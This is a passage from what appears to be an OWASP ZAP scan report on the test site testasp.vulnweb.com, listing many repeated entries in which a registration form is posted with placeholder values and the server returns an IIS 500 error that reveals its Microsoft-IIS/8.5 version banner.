Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:03 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:04 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:05 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D18 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 467 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D19 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:06 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>500 - Internal server error.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>500 - Internal server error.</h2> <h3>There is a problem with the resource you are looking for, and it cannot be displayed.</h3> </fieldset></div> </div> </body> </html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 465 bytes. |
POST http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D2 Content-Length: 47 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 47 bytes. |
tfUName=ZAP&tfRName=ZAP&tfEmail=ZAP&tfUPass=ZAP
|
| Response Header - size: 196 bytes. |
HTTP/1.1 500 Internal Server Error
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:01 GMT Content-Length: 1208 |
| Response Body - size: 1,208 bytes. |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
